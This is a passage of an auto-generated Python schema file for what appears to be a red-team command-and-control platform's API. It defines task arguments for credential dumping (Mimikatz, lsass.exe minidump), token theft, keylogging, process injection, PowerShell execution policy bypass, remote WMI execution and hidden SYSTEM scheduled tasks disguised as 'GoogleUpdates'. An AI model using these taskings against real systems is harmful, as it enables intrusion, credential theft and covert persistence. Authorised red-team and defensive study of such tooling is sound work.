# generated by datamodel-codegen:
#   filename:  openapi.json
#   timestamp: 2021-07-19T18:36:07+00:00

from __future__ import annotations

from datetime import datetime
from enum import Enum
from typing import Any, Dict, List, Optional
from uuid import UUID

from pydantic import Field

from .schema import Schema


class AccessToken(Schema):
    access_token: str = Field(..., title="Access Token")
    token_type: str = Field(..., title="Token Type")


class ApiConfig(Schema):
    api_version: str = Field(..., alias="apiVersion", title="Apiversion")
    app_version: str = Field(..., alias="appVersion", title="Appversion")
    env: str = Field(..., title="Env")
    storage_url: str = Field(..., alias="storageUrl", title="Storageurl")


class Architecture(str, Enum):
    x86 = "x86"
    x64 = "x64"


class BlobReferenceRoot(Schema):
    id: Optional[str] = Field(None, description="Blob identifier", title="Id")
    name: Optional[str] = Field(None, description="Contextual name", title="Name")
    data: Optional[bytes] = Field(None, description="Raw data", title="Data")


class BodyCreateBlobApiBlobsPost(Schema):
    data: bytes = Field(..., title="Data")


class BodyLoginApiAuthTokenPost(Schema):
    grant_type: Optional[str] = Field(None, regex="password", title="Grant Type")
    username: str = Field(..., title="Username")
    password: str = Field(..., title="Password")
    scope: Optional[str] = Field("", title="Scope")
    client_id: Optional[str] = Field(None, title="Client Id")
    client_secret: Optional[str] = Field(None, title="Client Secret")


class Camera(Schema):
    id: int = Field(..., description="Camera ID", example=1, title="Id")
    name: Optional[str] = Field(None, description="Camera Name", example="Logitech C120", title="Name")


class CameraCaptureArguments(Schema):
    camera_id: int = Field(
        ...,
        alias="cameraId",
        description="Target camera ID",
        example=1,
        title="Cameraid",
    )
    quality: Optional[int] = Field(
        25,
        description="Capture quality level",
        example=25,
        ge=1.0,
        le=99.0,
        title="Quality",
    )


class CameraListArguments(Schema):
    pass


class ClientScriptArguments(Schema):
    name: str = Field(..., description="Script name", example="pivot.py", title="Name")
    arguments: Optional[str] = Field(
        "",
        description="Script arguments",
        example="--host MACHINE-A",
        title="Arguments",
    )


class ClientScriptToken(Schema):
    access_token: str = Field(..., title="Access Token")
    token_type: str = Field(..., title="Token Type")
    task_id: UUID = Field(..., title="Task Id")


class ContentHint(str, Enum):
    text = "text"
    image = "image"


class ContextIdleArguments(Schema):
    pass


class ContextProcessArguments(Schema):
    pass


class ContextUserArguments(Schema):
    verbose: Optional[bool] = Field(
        False,
        description="Provide verbose information about the current token",
        example=False,
        title="Verbose",
    )


class DiscoveredInstance(Schema):
    path: str = Field(..., description="Path of discovery", example="mypipe1", title="Path")
    tag: str = Field(..., description="Instance tag", example="jPc4dpYI", title="Tag")


class DotNetFrameworkVersion(str, Enum):
    field_2 = "2"
    field_4 = "4"
    unknown = "unknown"


class ExitArguments(Schema):
    pass


class FileChangeDirectoryArguments(Schema):
    directory: Optional[str] = Field(
        "",
        description="New directory (leave empty/ommit to retrieve current)",
        example="C:\\Windows",
        title="Directory",
    )


class FileCopyArguments(Schema):
    source: str = Field(
        ...,
        description="Remote source file path (supports environment variables)",
        example="C:\\source.ext",
        title="Source",
    )
    destination: str = Field(
        ...,
        description="Remote destination file path (supports environment variables)",
        example="%WINDIR%\\destination.ext",
        title="Destination",
    )
    force: Optional[bool] = Field(
        False,
        description="Overwrite the target file if needed",
        example=False,
        title="Force",
    )


class FileDownloadArguments(Schema):
    path: str = Field(
        ...,
        description="Remote file path (supports environment variables)",
        example="C:\\Windows\\win.ini",
        title="Path",
    )
    print: Optional[bool] = Field(
        False,
        description="Request to print the results directly when possible",
        title="Print",
    )


class FileMakeDirectoryArguments(Schema):
    path: str = Field(
        ...,
        description="Remote directory path (supports environment variables)",
        example="C:\\temporary",
        title="Path",
    )


class FileMoveArguments(Schema):
    source: str = Field(
        ...,
        description="Remote source file path (supports environment variables)",
        example="C:\\source.ext",
        title="Source",
    )
    destination: str = Field(
        ...,
        description="Remote destination file path (supports environment variables)",
        example="%WINDIR%\\destination.ext",
        title="Destination",
    )
    force: Optional[bool] = Field(
        False,
        description="Overwrite the target file if needed",
        example=False,
        title="Force",
    )


class FileOrDirectory(Schema):
    name: str = Field(..., description="File/Directory name", example="win.ini", title="Name")
    is_dir: Optional[bool] = Field(
        False,
        alias="isDir",
        description="Object is a directory",
        example=False,
        title="Isdir",
    )
    time: datetime = Field(
        ...,
        description="Last queried time metric (access, create, write)",
        example="2000-01-02T03:04:05",
        title="Time",
    )
    size: Optional[int] = Field(None, description="File size in bytes ", example=1423, title="Size")


class FileRemoveArguments(Schema):
    path: str = Field(
        ...,
        description="Remote file path (supports environment variables)",
        example="%WINDIR%\\temporary.ext",
        title="Path",
    )
    force: Optional[bool] = Field(False, description="Overwrite the target file if needed", title="Force")


class FileRemoveDirectoryArguments(Schema):
    path: str = Field(
        ...,
        description="Remote directory path (supports environment variables)",
        example="C:\\temporary",
        title="Path",
    )


class HostPowershellArguments(Schema):
    base_url: Optional[str] = Field(
        "",
        alias="baseUrl",
        description="Base URL (default is from profile)",
        example="http://mycustom.com",
        title="Baseurl",
    )
    local: Optional[bool] = Field(True, description="Remain in the local process after load", title="Local")
    process: Optional[str] = Field(
        "",
        description="Process to inject into (not compatible with -l/--local)",
        title="Process",
    )
    com_object: Optional[bool] = Field(
        False,
        alias="comObject",
        description="Use IE com object to download payload (useful for stealth/proxies)",
        title="Comobject",
    )
    endpoint: Optional[str] = Field(
        "",
        description="Web endpoint path to host data",
        example="/custom",
        title="Endpoint",
    )


class HostUnloadArguments(Schema):
    pass


class HostingEncoding(str, Enum):
    none = "none"
    base64 = "base64"
    hex = "hex"


class InfoArguments(Schema):
    pass


class InjectionTechnique(str, Enum):
    standard = "standard"
    setthreadcontext = "setthreadcontext"


class InstanceInUpdate(Schema):
    name: str = Field(..., max_length=100, title="Name")
    hidden: bool = Field(..., title="Hidden")


class KerberosPurgeArguments(Schema):
    pass


class KeylogGatherArguments(Schema):
    path: Optional[str] = Field(
        "",
        description="Encrypted keylog file location (otherwise assumed profile['keylogger']['storage_path'])",
        example="C:\\Users\\Public\\log.dat",
        title="Path",
    )


class LinkArguments(Schema):
    target: str = Field(
        ...,
        description="Target IP, hostname, or address",
        example="localhost",
        title="Target",
    )


class ManagedModuleExecuteArguments(Schema):
    version: Optional[DotNetFrameworkVersion] = Field(
        "unknown",
        description="Framework version for hosting (otherwise assumed from instance version)",
        example="4",
    )
    input: str = Field(
        ...,
        description="Input to managed module",
        example="run download",
        title="Input",
    )
    method: str = Field(
        ...,
        description="Fully qualified method name",
        example="Namespace.Class.Method",
        title="Method",
    )


class ManagedModuleUnloadArguments(Schema):
    version: Optional[DotNetFrameworkVersion] = Field(
        "unknown",
        description="Framework version for hosting (otherwise assumed from instance version)",
        example="4",
    )


class MimikatzExecuteArguments(Schema):
    input: str = Field(..., description="Input to Mimikatz module", example="version", title="Input")


class MimikatzLoadArguments(Schema):
    pass


class MinidumpArguments(Schema):
    path: str = Field(
        ...,
        description="Remote file path (supports environment variables)",
        example="%TEMP%\\proc.dmp",
        title="Path",
    )
    process: Optional[str] = Field(
        "",
        description="Process name/pid to dump (otherwise local)",
        example="lsass.exe",
        title="Process",
    )


class NativeModuleExecuteArguments(Schema):
    input: str = Field(..., description="Input to native module", example="version", title="Input")
    export: str = Field(
        ...,
        description="Exported function name from module (first match)",
        example="MyExport",
        title="Export",
    )


class NativeModuleUnloadArguments(Schema):
    pass


class NetworkConnectArguments(Schema):
    hosts: str = Field(
        ...,
        description="IP address(s) in single, range, or CIDR format",
        example="192.168.1.1/26",
        title="Hosts",
    )
    port: int = Field(..., description="Destination port", example="3389", title="Port")
    timeout: Optional[int] = Field(1000, description="TCP timeout in ms", example=1000, title="Timeout")


class NetworkEnumerateSessionArguments(Schema):
    host: str = Field(..., description="Hostname or IP address", example="REMOTE-PC", title="Host")


class NetworkPingArguments(Schema):
    host: str = Field(..., description="Hostname or IP address", example="ADAM-PC", title="Host")


class NetworkResolveArguments(Schema):
    host: str = Field(..., description="Hostname", example="ADAM-PC", title="Host")


class PowershellBaseArguments(Schema):
    version: Optional[DotNetFrameworkVersion] = Field(
        "unknown",
        description="Framework version for hosting (otherwise assumed from instance version)",
        example="4",
    )


class PowershellExecuteArguments(Schema):
    version: Optional[DotNetFrameworkVersion] = Field(
        "unknown",
        description="Framework version for hosting (otherwise assumed from instance version)",
        example="4",
    )
    input: str = Field(
        ...,
        description="Input to Powershell module",
        example="Get-Host | ft",
        title="Input",
    )


class PowershellLoadArguments(Schema):
    version: Optional[DotNetFrameworkVersion] = Field(
        "unknown",
        description="Framework version for hosting (otherwise assumed from instance version)",
        example="4",
    )


class PowershellUnstageArguments(Schema):
    pass


class Process(Schema):
    ppid: int = Field(..., description="Parent process id", example=567, title="Ppid")
    pid: int = Field(..., description="Process id", example=432, title="Pid")
    sess: int = Field(..., description="Session id", example=1, title="Sess")
    arch: Optional[Architecture] = Field(None, description="Process architecture", example="x64")
    name: Optional[str] = Field(None, description="Process name", example="cmd.exe", title="Name")
    owner: Optional[str] = Field(None, description="Process owner", example="ACME\\John", title="Owner")
    path: Optional[str] = Field(
        None,
        description="Full process path",
        example="C:\\Windows\\System32\\cmd.exe",
        title="Path",
    )


class ProcessExecuteBaseArguments(Schema):
    command: str = Field(
        ...,
        description="Full command line string",
        example="rundll32.exe mine.dll,export",
        title="Command",
    )
    parent: Optional[str] = Field(
        "",
        description="Parent process name/id to spawn under (otherwise local)",
        example="explorer.exe",
        title="Parent",
    )
    microsoft_only: Optional[bool] = Field(
        False,
        alias="microsoftOnly",
        description="Use process mitigation policies to block the loading of 3rd party code on process start",
        example=False,
        title="Microsoftonly",
    )


class ProcessListArguments(Schema):
    verbose: Optional[bool] = Field(
        False,
        description="Provide verbose information about processes",
        example=False,
        title="Verbose",
    )


class ProcessPowershellArguments(Schema):
    command: str = Field(
        ...,
        description="Full command line string",
        example="rundll32.exe mine.dll,export",
        title="Command",
    )
    parent: Optional[str] = Field(
        "",
        description="Parent process name/id to spawn under (otherwise local)",
        example="explorer.exe",
        title="Parent",
    )
    microsoft_only: Optional[bool] = Field(
        False,
        alias="microsoftOnly",
        description="Use process mitigation policies to block the loading of 3rd party code on process start",
        example=False,
        title="Microsoftonly",
    )
    additional_args: Optional[str] = Field(
        None,
        alias="additionalArgs",
        description="Add arguments to powershell.exe (-nop or -v2)",
        example="-nop -exec bypass",
        title="Additionalargs",
    )


class ProcessShellArguments(Schema):
    command: str = Field(
        ...,
        description="Full command line string",
        example="rundll32.exe mine.dll,export",
        title="Command",
    )
    parent: Optional[str] = Field(
        "",
        description="Parent process name/id to spawn under (otherwise local)",
        example="explorer.exe",
        title="Parent",
    )
    microsoft_only: Optional[bool] = Field(
        False,
        alias="microsoftOnly",
        description="Use process mitigation policies to block the loading of 3rd party code on process start",
        example=False,
        title="Microsoftonly",
    )


class ProcessStartArguments(Schema):
    command: str = Field(
        ...,
        description="Full command line string",
        example="rundll32.exe mine.dll,export",
        title="Command",
    )
    parent: Optional[str] = Field(
        "",
        description="Parent process name/id to spawn under (otherwise local)",
        example="explorer.exe",
        title="Parent",
    )
    microsoft_only: Optional[bool] = Field(
        False,
        alias="microsoftOnly",
        description="Use process mitigation policies to block the loading of 3rd party code on process start",
        example=False,
        title="Microsoftonly",
    )


class ProfileInCreate(Schema):
    name: str = Field(..., max_length=265, title="Name")
    data: Dict[str, Any] = Field(..., title="Data")


class Protocol(str, Enum):
    smb = "smb"
    http = "http"
    https = "https"
    dns = "dns"
    icmp = "icmp"


class RttPortalAccessStatus(str, Enum):
    completed = "completed"
    auth_pending = "auth_pending"
    auth_required = "auth_required"


class RegistryDeleteArguments(Schema):
    path: str = Field(
        ...,
        description="Full registry path",
        example="HKEY_LOCAL_MACHINE\\Software",
        title="Path",
    )
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    value: Optional[str] = Field("", description="Registry sub-value name", example="MyValue", title="Value")


class RegistryQueryArguments(Schema):
    path: str = Field(
        ...,
        description="Full registry path",
        example="HKEY_LOCAL_MACHINE\\Software",
        title="Path",
    )
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    value: Optional[str] = Field("", description="Registry sub-value name", example="MyValue", title="Value")


class RegistryType(str, Enum):
    reg_none = "REG_NONE"
    reg_sz = "REG_SZ"
    reg_expand_sz = "REG_EXPAND_SZ"
    reg_binary = "REG_BINARY"
    reg_dword = "REG_DWORD"
    reg_dword_little_endian = "REG_DWORD_LITTLE_ENDIAN"
    reg_dword_big_endian = "REG_DWORD_BIG_ENDIAN"
    reg_link = "REG_LINK"
    reg_multi_sz = "REG_MULTI_SZ"
    reg_resource_list = "REG_RESOURCE_LIST"
    reg_full_resource_descriptor = "REG_FULL_RESOURCE_DESCRIPTOR"
    reg_resource_requirements_list = "REG_RESOURCE_REQUIREMENTS_LIST"
    reg_qword = "REG_QWORD"
    reg_qword_little_endian = "REG_QWORD_LITTLE_ENDIAN"


class RegistryValue(Schema):
    name: str = Field(..., description="Value name", title="Name")
    type: RegistryType = Field(..., description="Value type")
    data: str = Field(
        ...,
        description="Value data (Base64 for REG_BINARY and '|' to separate MULTI_SZ)",
        title="Data",
    )


class RoundtripToken(Schema):
    token: str = Field(..., title="Token")
    verify_url: str = Field(..., alias="verifyUrl", title="Verifyurl")
    finish_url: str = Field(..., alias="finishUrl", title="Finishurl")
    expires: datetime = Field(..., title="Expires")


class RouteInResponse(Schema):
    id: UUID = Field(..., title="Id")
    instance_id: UUID = Field(..., alias="instanceId", title="Instanceid")
    protocol: Protocol
    port: int = Field(..., title="Port")
    pipe: str = Field(..., title="Pipe")
    timeout: int = Field(..., title="Timeout")


class ScheduledTaskCreateArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    folder: Optional[str] = Field(
        "\\",
        description="Parent folder for operation",
        example="\\Microsoft\\",
        title="Folder",
    )
    task: str = Field(..., description="Task name", example="GoogleUpdates", title="Task")
    command: str = Field(..., description="Command binary to execute", example="cmd.exe", title="Command")
    arguments: Optional[str] = Field(
        "",
        description="Arguments to command binary",
        example="/c whoami",
        title="Arguments",
    )
    user: str = Field(
        ...,
        description="User ID for task execution (name, SID, etc)",
        example="NT AUTHORITY\\SYSTEM",
        title="User",
    )
    hidden: Optional[bool] = Field(False, description="Mark the task as hidden", example=True, title="Hidden")
    high_privilege: Optional[bool] = Field(
        False,
        alias="highPrivilege",
        description="Run with highest privileges",
        example=True,
        title="Highprivilege",
    )


class ScheduledTaskDeleteArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    folder: Optional[str] = Field(
        "\\",
        description="Parent folder for operation",
        example="\\Microsoft\\",
        title="Folder",
    )
    task: str = Field(..., description="Task name", example="GoogleUpdates", title="Task")


class ScheduledTaskQueryArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    folder: Optional[str] = Field(
        "\\",
        description="Parent folder for operation",
        example="\\Microsoft\\",
        title="Folder",
    )
    task: Optional[str] = Field(
        "",
        description="Task name (ommit to query folder)",
        example="GoogleUpdates",
        title="Task",
    )


class ScheduledTaskStartArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    folder: Optional[str] = Field(
        "\\",
        description="Parent folder for operation",
        example="\\Microsoft\\",
        title="Folder",
    )
    task: str = Field(..., description="Task name", example="GoogleUpdates", title="Task")


class ScheduledTaskState(str, Enum):
    unknown = "unknown"
    disabled = "disabled"
    queued = "queued"
    ready = "ready"
    running = "running"


class ScheduledTaskStopArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    folder: Optional[str] = Field(
        "\\",
        description="Parent folder for operation",
        example="\\Microsoft\\",
        title="Folder",
    )
    task: str = Field(..., description="Task name", example="GoogleUpdates", title="Task")


class SchemaModel(Schema):
    pass


class ScreenshotArguments(Schema):
    quality: Optional[int] = Field(
        25,
        description="Capture quality level",
        example=25,
        ge=1.0,
        le=99.0,
        title="Quality",
    )


class ScriptType(str, Enum):
    client = "client"
    server = "server"


class SePrivilege(str, Enum):
    se_create_token_privilege = "SeCreateTokenPrivilege"
    se_assign_primary_token_privilege = "SeAssignPrimaryTokenPrivilege"
    se_lock_memory_privilege = "SeLockMemoryPrivilege"
    se_increase_quota_privilege = "SeIncreaseQuotaPrivilege"
    se_machine_account_privilege = "SeMachineAccountPrivilege"
    se_tcb_privilege = "SeTcbPrivilege"
    se_security_privilege = "SeSecurityPrivilege"
    se_take_ownership_privilege = "SeTakeOwnershipPrivilege"
    se_load_driver_privilege = "SeLoadDriverPrivilege"
    se_system_profile_privilege = "SeSystemProfilePrivilege"
    se_systemtime_privilege = "SeSystemtimePrivilege"
    se_profile_single_process_privilege = "SeProfileSingleProcessPrivilege"
    se_increase_base_priority_privilege = "SeIncreaseBasePriorityPrivilege"
    se_create_pagefile_privilege = "SeCreatePagefilePrivilege"
    se_create_permanent_privilege = "SeCreatePermanentPrivilege"
    se_backup_privilege = "SeBackupPrivilege"
    se_restore_privilege = "SeRestorePrivilege"
    se_shutdown_privilege = "SeShutdownPrivilege"
    se_debug_privilege = "SeDebugPrivilege"
    se_audit_privilege = "SeAuditPrivilege"
    se_system_environment_privilege = "SeSystemEnvironmentPrivilege"
    se_change_notify_privilege = "SeChangeNotifyPrivilege"
    se_remote_shutdown_privilege = "SeRemoteShutdownPrivilege"
    se_undock_privilege = "SeUndockPrivilege"
    se_sync_agent_privilege = "SeSyncAgentPrivilege"
    se_enable_delegation_privilege = "SeEnableDelegationPrivilege"
    se_manage_volume_privilege = "SeManageVolumePrivilege"
    se_impersonate_privilege = "SeImpersonatePrivilege"
    se_create_global_privilege = "SeCreateGlobalPrivilege"
    se_trusted_cred_man_access_privilege = "SeTrustedCredManAccessPrivilege"
    se_relabel_privilege = "SeRelabelPrivilege"
    se_increase_working_set_privilege = "SeIncreaseWorkingSetPrivilege"
    se_time_zone_privilege = "SeTimeZonePrivilege"
    se_create_symbolic_link_privilege = "SeCreateSymbolicLinkPrivilege"
    se_delegate_session_user_impersonate_privilege = "SeDelegateSessionUserImpersonatePrivilege"


class ServerScriptStatus(str, Enum):
    stopped = "stopped"
    running = "running"
    error = "error"


class ServiceCreateArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    service: str = Field(..., description="Service name", example="spoolsv", title="Service")
    display_name: Optional[str] = Field(
        "",
        alias="displayName",
        description="Friendly display name",
        example="My Service",
        title="Displayname",
    )
    command: str = Field(
        ...,
        description="Command string",
        example="C:\\Windows\\service.exe",
        title="Command",
    )


class ServiceDeleteArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    service: str = Field(..., description="Service name", example="spoolsv", title="Service")


class ServiceErrorControl(str, Enum):
    error_ignore = "error_ignore"
    error_normal = "error_normal"
    error_severe = "error_severe"
    error_critical = "error_critical"


class ServiceQueryArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    service: str = Field(..., description="Service name", example="spoolsv", title="Service")


class ServiceStartArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    service: str = Field(..., description="Service name", example="spoolsv", title="Service")


class ServiceStartType(str, Enum):
    boot_start = "boot_start"
    system_start = "system_start"
    auto_start = "auto_start"
    demand_start = "demand_start"
    disabled = "disabled"


class ServiceState(str, Enum):
    stopped = "stopped"
    start_pending = "start_pending"
    stop_pending = "stop_pending"
    running = "running"
    continue_pending = "continue_pending"
    pause_pending = "pause_pending"
    paused = "paused"


class ServiceStopArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    service: str = Field(..., description="Service name", example="spoolsv", title="Service")


class ServiceType(str, Enum):
    kernel_driver = "kernel_driver"
    file_system_driver = "file_system_driver"
    adapter = "adapter"
    recognizer_driver = "recognizer_driver"
    win32_own_process = "win32_own_process"
    win32_share_process = "win32_share_process"
    user_own_process = "user_own_process"
    user_share_process = "user_share_process"
    interactive_process = "interactive_process"


class SessionDetails(Schema):
    username: str = Field(..., description="Session username", example="Jason", title="Username")
    source: str = Field(..., description="Source hostname", example="SOURCE-PC", title="Source")
    active: int = Field(..., description="Active time in minutes", example=30, title="Active")
    idle: int = Field(..., description="Idle time in minutes", example=15, title="Idle")


class ShareAddArguments(Schema):
    path: str = Field(..., description="UNC path to map", example="\\\\REMOTE\\C$", title="Path")
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\John",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )


class ShareDeleteArguments(Schema):
    share: str = Field(..., description="Mapped share name", example="\\\\REMOTE\\C$", title="Share")


class ShareDisplayType(str, Enum):
    generic = "generic"
    domain = "domain"
    server = "server"
    share = "share"
    file = "file"
    group = "group"
    network = "network"
    root = "root"
    share_admin = "share_admin"
    directory = "directory"


class ShareListArguments(Schema):
    pass


class ShareScope(str, Enum):
    connected = "connected"
    globalnet = "globalnet"
    remembered = "remembered"
    recent = "recent"
    context = "context"


class ShareType(str, Enum):
    any = "any"
    disk = "disk"
    print = "print"
    reserved = "reserved"
    unknown = "unknown"


class StdioType(str, Enum):
    out = "out"
    error = "error"


class TaskArguments(Schema):
    pass


class TaskContext(str, Enum):
    system = "system"
    user = "user"
    script = "script"


class TaskDelivery(str, Enum):
    invalid = "invalid"
    queued = "queued"
    delivered = "delivered"
    in_progress = "in_progress"
    completed = "completed"
    blocked = "blocked"


class TaskErrorInfo(Schema):
    code: Optional[int] = Field(None, title="Code")
    description: Optional[str] = Field(None, title="Description")
    os_code: Optional[int] = Field(None, alias="osCode", title="Oscode")
    os_description: Optional[str] = Field(None, alias="osDescription", title="Osdescription")


class TaskInfo(Schema):
    path: str = Field(..., title="Path")
    state: ScheduledTaskState
    last_run: str = Field(..., alias="lastRun", title="Lastrun")
    last_result: int = Field(..., alias="lastResult", title="Lastresult")
    xml: str = Field(..., title="Xml")


class TaskResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )

    class Config:
        extra = "allow"


class TaskStatus(str, Enum):
    unknown = "unknown"
    success = "success"
    failure = "failure"
    warning = "warning"
    critical = "critical"


class TicketInResponse(Schema):
    ticket: str = Field(..., title="Ticket")
    expires_in: int = Field(..., alias="expiresIn", title="Expiresin")
    expires_at: datetime = Field(..., alias="expiresAt", title="Expiresat")


class TimeFormat(str, Enum):
    access = "access"
    create = "create"
    write = "write"


class TokenIntegrity(str, Enum):
    untrusted = "untrusted"
    low = "low"
    medium = "medium"
    medium_plus = "medium_plus"
    high = "high"
    system = "system"
    protected = "protected"
    secure = "secure"


class TokenLogonArguments(Schema):
    username: str = Field(
        ...,
        description="Account username (Accepts 'domain\\user' format)",
        title="Username",
    )
    password: str = Field(..., description="Account password", title="Password")
    netonly: Optional[bool] = Field(
        False,
        description="Use a NETONLY logon type to skip local credential validation",
        title="Netonly",
    )
    store: Optional[bool] = Field(
        False,
        description="Store the token for internal use and do not apply it to the current thread impersonate",
        title="Store",
    )


class TokenLogonResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class TokenPrivilegesArguments(Schema):
    pass


class TokenPrivilegesResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    privileges: Optional[List[SePrivilege]] = Field(
        [],
        description="Privileges successfully enabled for the current token",
        example=["SeDebugPrivilege", "SeShutdownPrivilege"],
    )


class TokenRevertArguments(Schema):
    pass


class TokenRevertResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class TokenStealArguments(Schema):
    process: str = Field(
        ...,
        description="Target process (name or id) for performing token duplication",
        title="Process",
    )


class TokenStealResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class Tool(str, Enum):
    slingshot = "slingshot"
    throwback = "throwback"
    downlink = "downlink"


class TransactionInResponse(Schema):
    id: UUID = Field(..., title="Id")
    created_at: datetime = Field(..., alias="createdAt", title="Createdat")
    tool: Tool
    protocol: Protocol
    source: Optional[str] = Field(None, max_length=256, title="Source")
    destination: Optional[str] = Field(None, max_length=256, title="Destination")
    details: Optional[Dict[str, Any]] = Field(None, title="Details")
    instance_id: Optional[UUID] = Field(None, alias="instanceId", title="Instanceid")


class UserInChangePassword(Schema):
    old_password: str = Field(..., alias="oldPassword", max_length=100, title="Oldpassword")
    new_password: str = Field(..., alias="newPassword", max_length=100, title="Newpassword")


class UserRole(str, Enum):
    admin = "admin"
    operator = "operator"
    observer = "observer"


class ValidationError(Schema):
    loc: List[str] = Field(..., title="Location")
    msg: str = Field(..., title="Message")
    type: str = Field(..., title="Error Type")


class WmiInstanceCallArguments(Schema):
    machine: Optional[str] = Field(
        "localhost",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    namespace: Optional[str] = Field(
        "ROOT\\CIMV2",
        description="Wmi target namespace",
        example="ROOT\\CIMV2",
        title="Namespace",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    authority: Optional[str] = Field(
        "",
        description="Authentication authority",
        example="Kerberos:ACME\\HostA",
        title="Authority",
    )
    filter: str = Field(
        ...,
        description="WQL filter string",
        example="Select * from Win32_OperatingSystem",
        title="Filter",
    )
    method: str = Field(..., description="Method name", example="Create", title="Method")
    parameters: Dict[str, Any] = Field(
        ...,
        description="Method parameters",
        example={"CommandLine": "C:\\Windows\\System32\\cmd.exe"},
        title="Parameters",
    )


class WmiInstanceCallResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    results: Optional[Dict[str, Any]] = Field(
        {},
        description="Wmi results",
        example={
            "BootDevice": "\\Device\\HarddiskVolume5",
            "BuildNumber": 17134,
            "BuildType": "Multiprocessor Free",
            "Caption": "Microsoft Windows 10 Pro",
            "CodeSet": 1252,
        },
        title="Results",
    )


class WmiProcessCreateArguments(Schema):
    machine: Optional[str] = Field(
        "localhost",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    namespace: Optional[str] = Field(
        "ROOT\\CIMV2",
        description="Wmi target namespace",
        example="ROOT\\CIMV2",
        title="Namespace",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    authority: Optional[str] = Field(
        "",
        description="Authentication authority",
        example="Kerberos:ACME\\HostA",
        title="Authority",
    )
    command: str = Field(
        ...,
        description="Command line string",
        example="C:\\Windows\\System32\\cmd.exe /C ipconfig",
        title="Command",
    )


class WmiProcessCreateResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    results: Optional[Dict[str, Any]] = Field(
        {},
        description="Wmi results",
        example={
            "BootDevice": "\\Device\\HarddiskVolume5",
            "BuildNumber": 17134,
            "BuildType": "Multiprocessor Free",
            "Caption": "Microsoft Windows 10 Pro",
            "CodeSet": 1252,
        },
        title="Results",
    )


class WmiQueryArguments(Schema):
    machine: Optional[str] = Field(
        "localhost",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    namespace: Optional[str] = Field(
        "ROOT\\CIMV2",
        description="Wmi target namespace",
        example="ROOT\\CIMV2",
        title="Namespace",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
